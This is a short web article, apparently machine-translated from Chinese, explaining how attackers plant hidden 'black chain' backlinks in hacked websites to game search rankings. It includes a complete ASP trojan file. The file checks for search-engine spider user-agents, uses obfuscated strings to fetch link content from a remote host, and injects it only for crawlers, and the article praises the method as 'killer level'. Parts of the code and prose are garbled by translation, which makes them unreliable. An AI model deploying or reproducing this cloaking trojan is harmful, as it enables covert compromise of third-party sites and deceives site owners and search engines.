Abstract: Black chain is a very common method of SEO, generally speaking, it refers to some people with abnormal means to obtain the reverse links of other sites, the most common black chain is through a variety of web site procedures to get the search engine weight or PR higher
The black chain is a very common method of SEO, generally speaking, it refers to some people with abnormal means to obtain the reverse links of other sites, the most common black chain is through a variety of web site procedures to get the search engine weight or PR higher site Webshell, And then in the hacked site to link their own sites.
Hackers do black chain may be a variety of ways, but there are only two means, one is directly on the target site directly with a specific link code, the other only for search engine access to do, so that the search engine mistakenly believe that there is such a link on the target station. The following is a detailed explanation of the two methods.
1. Add code directly to the target page: this should be the most common means, but also easy to find. Most of the previous black chains were used in this way. First need to invade the target station FTP, and then for the site used by the program, in the template or other pages plus "invisible" link. This means concealment is relatively poor, if the target station administrator know a certain SEO knowledge, it is easy to be found. As a result, more hackers began to use the second method.
2. Pass a decision of the code, determine the name and IP address of the caller, if the visitor is a spider, then add another section of the code containing the link to the target page. An example of an ASP is described below:
Hackers invade to the target station FTP, in the program left 2 trojan files, a file name int.asp, contains the code:
<%
On Error Resume Next user_agent=request.servervariables ("Http_user_agent") httpuser=lcase
(Request.ServerVariables ("Http_user_agent"))
If InStr (Httpuser, "Baidu") >0 or InStr (Httpuser, "Google") >0 or InStr (Httpuser, "Sogou") >0 or InStr (Httpuser, " Soso ") >0
Then Set objxmlhttp=server.createobject ("MSX" + "Ml2.s" + "Erv" + "Erxml" + "HTTP") Objxmlhttp.open "Get", "http://domain/a /193.txt ", False objxmlhttp.send gethtml=objxmlhttp.responsebody
Set objxmlhttp=nothing Set objstream = Server.CreateObject ("ADODB.stream") objStream.Type = 1
Objstream.mode =3 objStream.Open Objstream.write
gethtml objstream.position = 0 objStream.Type = 2 Objstream.charset = "gb2312″gethtml = Objstream.readtext objStream.Close Key1=lcase (gethtml) key1=replace (key1& "", "-istxt-", "")
Response. Write Key1 End If
%>
Determine whether a visitor is a spider by IP and access name, and write another file named "193.txt" (mostly linked code) to the target page. The code that spiders crawl is not the same as the code we see. Whether it is to check the source file or webmaster tools, there is no way to find the existence of black chain. There is only one way to check the snapshot Archive code page to see the problem.
The second approach, although complicated, is not easy to find, even if you use this method to let your site be k, you may be can not find the problem. Really belong to the killer level black chain means.